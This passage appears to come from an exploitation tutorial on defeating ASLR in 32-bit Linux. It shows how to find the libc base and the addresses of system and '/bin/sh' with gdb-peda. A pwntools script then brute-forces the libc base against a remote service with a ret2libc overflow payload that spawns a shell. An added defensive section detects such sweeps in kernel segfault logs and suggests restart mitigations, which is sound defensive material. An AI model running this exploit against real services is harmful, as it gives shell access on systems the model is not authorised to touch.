If the process creates children every time you talk to it (network server), try to read that file (you will probably need to be root).
Here you can find exactly where libc is loaded inside the process and where it will be loaded for every child of the process.
In this case it is loaded at 0xb75dc000 (this will be the base address of libc).
Using gdb-peda
Get the address of the system function, the exit function and the string "/bin/sh" using gdb-peda:
p system
p exit
find "/bin/sh"
Bypassing ASLR
You can try to bruteforce the base address of libc.
for off in range(0xb7000000, 0xb8000000, 0x1000):
Code
```python
from pwn import *

c = remote('192.168.85.181', 20002)
c.recvline()  # Banner

# Walk every page-aligned candidate for the libc base address
for off in range(0xb7000000, 0xb8000000, 0x1000):
    p = b""
    p += p32(off + 0x0003cb20)  # system
    p += b"CCCC"                # GARBAGE
    p += p32(off + 0x001388da)  # /bin/sh
    payload = b'A' * 0x20010 + p
    c.send(payload)
    c.interactive()  # ?
```
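The same loop seen from the defender's side, as an added example that is not part of the original page: a wrong guess that lands on an unmapped page typically crashes the child at the guessed address, so the kernel log fills with segfaults whose instruction pointers share one page offset and step through pages. The log lines, the process name `netsrv` and the `min_pages` threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of kernel segfault messages (not from the page).
# "netsrv" is a hypothetical forking server; "editor" is unrelated noise.
SAMPLE_LOG = """\
[  101.00] netsrv[2201]: segfault at b7000b20 ip b7000b20 sp bf9a1c40 error 14
[  101.21] netsrv[2202]: segfault at b7001b20 ip b7001b20 sp bf9a1c40 error 14
[  101.40] editor[1900]: segfault at 00000008 ip 0804a3f1 sp bfd20010 error 4 in editor[8048000+9000]
[  101.63] netsrv[2203]: segfault at b7002b20 ip b7002b20 sp bf9a1c40 error 14
[  101.85] netsrv[2204]: segfault at b7003b20 ip b7003b20 sp bf9a1c40 error 14
[  102.07] netsrv[2205]: segfault at b7004b20 ip b7004b20 sp bf9a1c40 error 14
"""

# Linux x86 segfault line: comm[pid]: segfault at ADDR ip IP sp SP ...
SEGV = re.compile(
    r"(?P<comm>[^\s\[]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+)"
)


def find_base_sweeps(log_text, min_pages=4, page_size=0x1000):
    """Return {(comm, page_offset): sorted pages} for suspected base sweeps.

    A sweep is many crashes in one program where control was transferred to
    a bad address (fault address == ip) and the faulting ip keeps the same
    offset within the page while the page itself changes.
    """
    pages = defaultdict(set)
    for m in SEGV.finditer(log_text):
        addr, ip = int(m["addr"], 16), int(m["ip"], 16)
        if addr != ip:  # ordinary data fault, not a jump to a bad target
            continue
        offset = ip % page_size
        pages[(m["comm"], offset)].add(ip - offset)
    return {k: sorted(v) for k, v in pages.items() if len(v) >= min_pages}


if __name__ == "__main__":
    for (comm, off), hit in find_base_sweeps(SAMPLE_LOG).items():
        print(f"{comm}: {len(hit)} crashes at page offset {off:#x}, "
              f"pages {hit[0]:#x}..{hit[-1]:#x}")
```

A hit on a forking service is a reason to look at restart policy: re-executing the server per connection gives each child a fresh libc base, and rate-limiting restarts after repeated crashes slows the sweep.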